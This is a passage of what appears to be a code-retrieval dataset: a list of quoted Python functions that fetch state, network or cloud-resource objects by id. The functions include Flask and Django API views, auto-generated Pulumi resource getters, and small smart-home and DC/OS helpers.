"def get_state(state_id):\n try:\n state = jsonify(storage.get(State, state_id).to_dict())\n return state\n except:\n abort(404)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n arn: Optional[pulumi.Input[str]] = None,\n auth_mode: Optional[pulumi.Input[str]] = None,\n default_s3_location: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n engine_security_group_id: Optional[pulumi.Input[str]] = None,\n idp_auth_url: Optional[pulumi.Input[str]] = None,\n idp_relay_state_parameter_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n service_role: Optional[pulumi.Input[str]] = None,\n subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n url: Optional[pulumi.Input[str]] = None,\n user_role: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n workspace_security_group_id: Optional[pulumi.Input[str]] = None) -> 'Studio':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _StudioState.__new__(_StudioState)\n\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"auth_mode\"] = auth_mode\n __props__.__dict__[\"default_s3_location\"] = default_s3_location\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"engine_security_group_id\"] = engine_security_group_id\n __props__.__dict__[\"idp_auth_url\"] = idp_auth_url\n __props__.__dict__[\"idp_relay_state_parameter_name\"] = idp_relay_state_parameter_name\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"service_role\"] = service_role\n __props__.__dict__[\"subnet_ids\"] = subnet_ids\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"url\"] = url\n __props__.__dict__[\"user_role\"] = user_role\n __props__.__dict__[\"vpc_id\"] = vpc_id\n __props__.__dict__[\"workspace_security_group_id\"] = workspace_security_group_id\n return Studio(resource_name, opts=opts, __props__=__props__)",
"def get_by_id(cls, name):\n\t\treturn super(Locality, cls).get_by_id(cls.normalized_name(name))",
"def get(self, request, state_id, format=None):\n try:\n state = State.objects.get(id=state_id)\n except ObjectDoesNotExist:\n raise NotFound(detail=\"State not found\")\n\n return Response(StateSerializer(state).data)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'NetworkGroup':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = dict()\n\n __props__[\"conditional_membership\"] = None\n __props__[\"description\"] = None\n __props__[\"display_name\"] = None\n __props__[\"etag\"] = None\n __props__[\"group_members\"] = None\n __props__[\"member_type\"] = None\n __props__[\"name\"] = None\n __props__[\"provisioning_state\"] = None\n __props__[\"system_data\"] = None\n __props__[\"type\"] = None\n return NetworkGroup(resource_name, opts=opts, __props__=__props__)",
"def get_state_by_id(states: [State], state_id: str, id_type: str) -> State:\n if id_type == 'new':\n for state in states:\n if state.new_id == state_id:\n return state\n if id_type == 'old':\n for state in states:\n if state.id == state_id:\n return state\n return states[0]",
"def get_one_state(state_id):\n state = storage.get('State', state_id)\n if state is None:\n abort(404)\n if request.method == 'DELETE':\n storage.delete(state)\n storage.save()\n return jsonify({}), 200\n elif request.method == 'PUT':\n try:\n res_dict = request.get_json()\n res_dict['id'] = state.id\n res_dict['created_at'] = state.created_at\n state.__init__(**res_dict)\n state.save()\n return jsonify(state.to_dict()), 200\n except:\n abort(400, description='Not a JSON')\n return jsonify(state.to_dict())",
"def get_network_by_id(self, id):\n return self.network.get_network(id)",
"def get_state(state_id):\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n return jsonify(state.to_dict())",
"def get_state(state_id):\n state = storage.get(\"State\", state_id)\n if state:\n return jsonify(state.to_dict())\n abort(404)",
"async def get_state(\n self,\n entity_id: str = None,\n attribute: str = None,\n default: Any = None,\n copy: bool = True,\n **kwargs: Optional[Any],\n ) -> Any:\n namespace = self._get_namespace(**kwargs)\n\n return await self.get_entity_api(namespace, entity_id).get_state(attribute, default, copy, **kwargs)",
"def state_id(state_id):\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n else:\n return jsonify(state.to_dict())",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n force: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n state: Optional[pulumi.Input[str]] = None) -> 'InstanceState':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _InstanceStateState.__new__(_InstanceStateState)\n\n __props__.__dict__[\"force\"] = force\n __props__.__dict__[\"instance_id\"] = instance_id\n __props__.__dict__[\"state\"] = state\n return InstanceState(resource_name, opts=opts, __props__=__props__)",
"def a_states_id(state_id):\n i = storage.get(\"State\", state_id)\n if i:\n return jsonify(i.to_dict())\n else:\n return (jsonify({\"error\": \"Not found\"}), 404)",
"def from_esi_name(cls, esi_state_name: str) -> \"StructureService.State\":\n STATES_ESI_MAP = {\"offline\": cls.OFFLINE, \"online\": cls.ONLINE}\n return (\n STATES_ESI_MAP[esi_state_name]\n if esi_state_name in STATES_ESI_MAP\n else cls.OFFLINE\n )",
"def get(\n id: int = typer.Argument(1),\n ip: str = typer.Option(..., \"--ip\", \"-i\", envvar=\"HUE_BRIDGE_IP\"),\n user: str = typer.Option(..., \"--user\", \"-u\", envvar=\"HUE_BRIDGE_USER\"),\n):\n light = Light(id, ip=ip, user=user)\n resp = asyncio.run(light.get_state())\n console.print(f\"[{ip}] Light {id} State:\\n{json.dumps(resp, indent=2)}\")",
"def get_power_state(self, id_or_uri):\n uri = self._client.build_uri(id_or_uri) + \"/powerState\"\n return self._client.get(uri)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n asset_statuses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ZoneAssetStatusArgs']]]]] = None,\n create_time: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n discovery_spec: Optional[pulumi.Input[pulumi.InputType['ZoneDiscoverySpecArgs']]] = None,\n display_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n lake: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n resource_spec: Optional[pulumi.Input[pulumi.InputType['ZoneResourceSpecArgs']]] = None,\n state: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n uid: Optional[pulumi.Input[str]] = None,\n update_time: Optional[pulumi.Input[str]] = None) -> 'Zone':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ZoneState.__new__(_ZoneState)\n\n __props__.__dict__[\"asset_statuses\"] = asset_statuses\n __props__.__dict__[\"create_time\"] = create_time\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"discovery_spec\"] = discovery_spec\n __props__.__dict__[\"display_name\"] = display_name\n __props__.__dict__[\"labels\"] = labels\n __props__.__dict__[\"lake\"] = lake\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"resource_spec\"] = resource_spec\n __props__.__dict__[\"state\"] = state\n __props__.__dict__[\"type\"] = type\n __props__.__dict__[\"uid\"] = uid\n __props__.__dict__[\"update_time\"] = update_time\n return Zone(resource_name, opts=opts, __props__=__props__)",
"def getState(self, node, name=None):\n if name:\n info = self.getDevice(node, name)\n else:\n info = self.getNode(node, includeDevices=False)\n if info is None:\n self.log.error(\"could not get state because '%s%s' does not exist\", node, \"/\" + name if name else \"\")\n return None\n return info.state",
"def get_pool_state(pool_id, instance_name):\n r = subprocess.check_output([\n 'dcos',\n 'edgelb',\n 'list',\n '--name=' + instance_name,\n '--json'\n ], env=_dcos_path())\n pools = json.loads(r)\n\n display.vvv('looking for pool_id {}'.format(pool_id))\n\n state = 'absent'\n for p in pools:\n try:\n if pool_id in p['name']:\n state = 'present'\n display.vvv('found pool: {}'.format(pool_id))\n\n except KeyError:\n continue\n return state",
"def lookup(job_id: str) -> JobState:\n job = JobState(job_id)\n job.update()\n return job",
"def get_network(self, network_id):\n url = '%s/v2.0/networks/%s' % (self.catalog['network'], network_id)\n res = self.get(url)\n if res['status'] == 200:\n return json.loads(res['body'])['network']\n else:\n LOG.error('Get network failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)",
"def get(self, network_id: str, *_, **kwargs) -> Network: # pylint: disable=arguments-differ\n compatible = kwargs.get(\"compatible\", True)\n\n path = f\"/networks/{network_id}\" + (\"\" if compatible else \"/json\")\n\n response = self.client.get(path, compatible=compatible)\n body = response.json()\n\n if response.status_code != requests.codes.okay:\n if response.status_code == requests.codes.not_found:\n raise NotFound(body[\"cause\"], response=response, explanation=body[\"message\"])\n raise APIError(body[\"cause\"], response=response, explanation=body[\"message\"])\n\n if not compatible:\n body = body[0]\n\n return self.prepare_model(attrs=body)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n minimal_action: Optional[pulumi.Input[str]] = None,\n most_disruptive_allowed_action: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n preserved_state: Optional[pulumi.Input[pulumi.InputType['RegionPerInstanceConfigPreservedStateArgs']]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n region_instance_group_manager: Optional[pulumi.Input[str]] = None,\n remove_instance_state_on_destroy: Optional[pulumi.Input[bool]] = None) -> 'RegionPerInstanceConfig':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _RegionPerInstanceConfigState.__new__(_RegionPerInstanceConfigState)\n\n __props__.__dict__[\"minimal_action\"] = minimal_action\n __props__.__dict__[\"most_disruptive_allowed_action\"] = most_disruptive_allowed_action\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"preserved_state\"] = preserved_state\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"region_instance_group_manager\"] = region_instance_group_manager\n __props__.__dict__[\"remove_instance_state_on_destroy\"] = remove_instance_state_on_destroy\n return RegionPerInstanceConfig(resource_name, opts=opts, __props__=__props__)",
"def given_state(id):\n key = 'State.{}'.format(id)\n state = storage.all(State).get(key)\n return render_template('9-states.html', states=state)",
"def state_by_id(id):\n states = storage.all('State').values()\n for state in states:\n if state.id == id:\n return render_template('9-states.html', states=state)\n return render_template('9-states.html')",
"def statesById(state_id):\n obj = storage.get(State, state_id)\n if obj:\n return jsonify(obj.to_dict())\n return jsonify({\"error\": \"Not found\"}), 404",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n activation_key: Optional[pulumi.Input[str]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n ip_address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_link_endpoint: Optional[pulumi.Input[str]] = None,\n security_group_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n subnet_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vpc_endpoint_id: Optional[pulumi.Input[str]] = None) -> 'Agent':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _AgentState.__new__(_AgentState)\n\n __props__.__dict__[\"activation_key\"] = activation_key\n __props__.__dict__[\"arn\"] = arn\n __props__.__dict__[\"ip_address\"] = ip_address\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"private_link_endpoint\"] = private_link_endpoint\n __props__.__dict__[\"security_group_arns\"] = security_group_arns\n __props__.__dict__[\"subnet_arns\"] = subnet_arns\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"vpc_endpoint_id\"] = vpc_endpoint_id\n return Agent(resource_name, opts=opts, __props__=__props__)",
"def get_network(network_id, user_id, for_update=False, non_deleted=False):\n\n try:\n network_id = int(network_id)\n objects = Network.objects\n if for_update:\n objects = objects.select_for_update()\n network = objects.get(Q(userid=user_id) | Q(public=True),\n id=network_id)\n if non_deleted and network.deleted:\n raise faults.BadRequest(\"Network has been deleted.\")\n return network\n except (ValueError, TypeError):\n raise faults.BadRequest(\"Invalid network ID '%s'\" % network_id)\n except Network.DoesNotExist:\n raise faults.ItemNotFound('Network %s not found.' % network_id)",
"def find_ResNet_layer(arch, target_layer_name):\n\n hierarchy = target_layer_name.rsplit(\"_\",1)\n \n\n if target_layer_name.rsplit(\"_\",1)[0] == \"layer1\":\n target_layer = arch.layer1\n elif target_layer_name.rsplit(\"_\",1)[0] == \"layer2\":\n target_layer = arch.layer2\n elif target_layer_name.rsplit(\"_\",1)[0] == \"layer3\":\n target_layer = arch.layer3\n elif target_layer_name.rsplit(\"_\",1)[0] == \"layer4\":\n target_layer = arch.layer4\n \n# print(target_layer)\n if len(hierarchy) == 2:\n target_layer = target_layer[int(hierarchy[1])]\n\n return target_layer",
"def getState():\n engine = create_engine(\n 'mysql+mysqldb://{}:{}@localhost:3306/{}'.format(\n sys.argv[1],\n sys.argv[2],\n sys.argv[3]),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_states = State(name='Louisiana')\n session.add(new_states)\n\n for state in session.query(State).order_by(State.id).all():\n if state.name == \"Louisiana\":\n print(\"{}\".format(state.id))\n\n session.commit()\n session.close()",
"def get_network(self, name, disconnected=False):\n return self.get_networks(as_dict=True,\n disconnected=disconnected).get(name)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n attributes: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n description: Optional[pulumi.Input[str]] = None,\n disable_status_check: Optional[pulumi.Input[bool]] = None,\n email: Optional[pulumi.Input[str]] = None,\n masters: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project_id: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[int]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Zone':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ZoneState.__new__(_ZoneState)\n\n __props__.__dict__[\"attributes\"] = attributes\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"disable_status_check\"] = disable_status_check\n __props__.__dict__[\"email\"] = email\n __props__.__dict__[\"masters\"] = masters\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project_id\"] = project_id\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"ttl\"] = ttl\n __props__.__dict__[\"type\"] = type\n __props__.__dict__[\"value_specs\"] = value_specs\n return Zone(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n git_remote_settings: Optional[pulumi.Input[pulumi.InputType['RepositoryGitRemoteSettingsArgs']]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n workspace_compilation_overrides: Optional[pulumi.Input[pulumi.InputType['RepositoryWorkspaceCompilationOverridesArgs']]] = None) -> 'Repository':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _RepositoryState.__new__(_RepositoryState)\n\n __props__.__dict__[\"git_remote_settings\"] = git_remote_settings\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"project\"] = project\n __props__.__dict__[\"region\"] = region\n __props__.__dict__[\"workspace_compilation_overrides\"] = workspace_compilation_overrides\n return Repository(resource_name, opts=opts, __props__=__props__)",
"def get(self, sid: typing.Union[uuid.UUID, int]) -> bytes:\n if not self.tag.training:\n return bytes()\n if isinstance(sid, int):\n sid = self.tag.states[sid]\n if sid not in self.tag.states:\n raise Level.Invalid(f'Unknown state reference for {self}: {sid}')\n LOGGER.debug('%s: Getting state %s', self, sid)\n return STATES(self.registry, self.project.key, self.lineage.key, self.key, sid)",
"def get_network_by_name(self, name: str) -> Network:\n for network in self._networks:\n if network.name == name:\n return network\n raise errors.NotFoundError(f\"there exists no network named {name!r}\")",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n config: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[pulumi.InputType['SyntheticsPrivateLocationMetadataArgs']]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'SyntheticsPrivateLocation':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _SyntheticsPrivateLocationState.__new__(_SyntheticsPrivateLocationState)\n\n __props__.__dict__[\"config\"] = config\n __props__.__dict__[\"description\"] = description\n __props__.__dict__[\"metadata\"] = metadata\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"tags\"] = tags\n return SyntheticsPrivateLocation(resource_name, opts=opts, __props__=__props__)",
"def view_state_id(state_id):\n states_obj = storage.all(\"State\")\n if request.method == 'GET':\n for state in states_obj.values():\n if state.id == state_id:\n id_found = state.to_dict()\n return jsonify(id_found)\n abort(404)\n\n if request.method == 'DELETE':\n for state in states_obj.values():\n if state.id == state_id:\n storage.delete(state)\n storage.save()\n return make_response(jsonify({}), 200)\n abort(404)\n\n if request.method == 'PUT':\n key = \"State.\" + state_id\n states = storage.all(\"State\")\n instance = states.get(key)\n if instance is None:\n abort(404)\n else:\n if not request.json:\n abort(400, \"Not a JSON\")\n req_var = request.get_json()\n for key, value in req_var.items():\n setattr(instance, key, value)\n storage.save()\n return make_response(jsonify(instance.to_dict()), 200)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'ManagedNetworkGroup':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = ManagedNetworkGroupArgs.__new__(ManagedNetworkGroupArgs)\n\n __props__.__dict__[\"etag\"] = None\n __props__.__dict__[\"kind\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"management_groups\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"subnets\"] = None\n __props__.__dict__[\"subscriptions\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"virtual_networks\"] = None\n return ManagedNetworkGroup(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n algorithm: Optional[pulumi.Input[str]] = None,\n check: Optional[pulumi.Input[str]] = None,\n check_attempts: Optional[pulumi.Input[int]] = None,\n check_body: Optional[pulumi.Input[str]] = None,\n check_interval: Optional[pulumi.Input[int]] = None,\n check_passive: Optional[pulumi.Input[bool]] = None,\n check_path: Optional[pulumi.Input[str]] = None,\n check_timeout: Optional[pulumi.Input[int]] = None,\n cipher_suite: Optional[pulumi.Input[str]] = None,\n node_statuses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NodeBalancerConfigNodeStatusArgs']]]]] = None,\n nodebalancer_id: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[int]] = None,\n protocol: Optional[pulumi.Input[str]] = None,\n proxy_protocol: Optional[pulumi.Input[str]] = None,\n ssl_cert: Optional[pulumi.Input[str]] = None,\n ssl_commonname: Optional[pulumi.Input[str]] = None,\n ssl_fingerprint: Optional[pulumi.Input[str]] = None,\n ssl_key: Optional[pulumi.Input[str]] = None,\n stickiness: Optional[pulumi.Input[str]] = None) -> 'NodeBalancerConfig':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _NodeBalancerConfigState.__new__(_NodeBalancerConfigState)\n\n __props__.__dict__[\"algorithm\"] = algorithm\n __props__.__dict__[\"check\"] = check\n __props__.__dict__[\"check_attempts\"] = check_attempts\n __props__.__dict__[\"check_body\"] = check_body\n __props__.__dict__[\"check_interval\"] = check_interval\n __props__.__dict__[\"check_passive\"] = check_passive\n __props__.__dict__[\"check_path\"] = check_path\n __props__.__dict__[\"check_timeout\"] = check_timeout\n __props__.__dict__[\"cipher_suite\"] = cipher_suite\n __props__.__dict__[\"node_statuses\"] = node_statuses\n __props__.__dict__[\"nodebalancer_id\"] = nodebalancer_id\n __props__.__dict__[\"port\"] = port\n __props__.__dict__[\"protocol\"] = protocol\n __props__.__dict__[\"proxy_protocol\"] = proxy_protocol\n __props__.__dict__[\"ssl_cert\"] = ssl_cert\n __props__.__dict__[\"ssl_commonname\"] = ssl_commonname\n __props__.__dict__[\"ssl_fingerprint\"] = ssl_fingerprint\n __props__.__dict__[\"ssl_key\"] = ssl_key\n __props__.__dict__[\"stickiness\"] = stickiness\n return NodeBalancerConfig(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n cidr: Optional[pulumi.Input[str]] = None,\n commissioning_enabled: Optional[pulumi.Input[bool]] = None,\n internet_advertising_disabled: Optional[pulumi.Input[bool]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n parent_custom_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n roa_validity_end_date: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n wan_validation_signed_message: Optional[pulumi.Input[str]] = None,\n zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Prefix':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _PrefixState.__new__(_PrefixState)\n\n __props__.__dict__[\"cidr\"] = cidr\n __props__.__dict__[\"commissioning_enabled\"] = commissioning_enabled\n __props__.__dict__[\"internet_advertising_disabled\"] = internet_advertising_disabled\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"parent_custom_ip_prefix_id\"] = parent_custom_ip_prefix_id\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"roa_validity_end_date\"] = roa_validity_end_date\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"wan_validation_signed_message\"] = wan_validation_signed_message\n __props__.__dict__[\"zones\"] = zones\n return Prefix(resource_name, opts=opts, __props__=__props__)",
"def get_network_with_name(self, name):\n for network in self.networks:\n if network.name == name:\n return network\n return None",
"def states_by_id(id):\n list_states = storage.all('State')\n state_id = 'State.{}'.format(id)\n if state_id in list_states:\n list_states = list_states[state_id]\n else:\n list_states = None\n return render_template('9-states.html', list_states=list_states)",
"def states_id(id=None):\n all_states = storage.all(State)\n foundstate = None\n for key, state in all_states.items():\n if state.id == id:\n foundstate = state\n break\n\n return render_template('9-states.html', States=all_states, ID=id,\n Stateobj=foundstate)",
"def find_layer_from_id(self, id):\n try:\n _layer, *_ = filter(lambda x: x.Id == id, self._file3dm.Layers)\n return _layer\n except ValueError:\n return None",
"def get_state(self, cell_id: int) -> State:\n return self.states[cell_id]",
"def get_state(self) -> str:\n url = f\"{self.ha_url}/api/states/{self.entity_id}\"\n\n req = urllib.request.Request(url=url, headers=self.headers)\n with urllib.request.urlopen(req) as r:\n response = r.read().decode(\"utf\")\n return json.loads(response)[\"state\"]",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n direction: Optional[pulumi.Input[str]] = None,\n dry_run: Optional[pulumi.Input[bool]] = None,\n listener_id: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None,\n rule_actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleRuleActionArgs']]]]] = None,\n rule_conditions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleRuleConditionArgs']]]]] = None,\n rule_name: Optional[pulumi.Input[str]] = None,\n status: Optional[pulumi.Input[str]] = None) -> 'Rule':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _RuleState.__new__(_RuleState)\n\n __props__.__dict__[\"direction\"] = direction\n __props__.__dict__[\"dry_run\"] = dry_run\n __props__.__dict__[\"listener_id\"] = listener_id\n __props__.__dict__[\"priority\"] = priority\n __props__.__dict__[\"rule_actions\"] = rule_actions\n __props__.__dict__[\"rule_conditions\"] = rule_conditions\n __props__.__dict__[\"rule_name\"] = rule_name\n __props__.__dict__[\"status\"] = status\n return Rule(resource_name, opts=opts, __props__=__props__)",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnConnectionRouteArgs']]]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel1LogOptionsArgs']]] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: 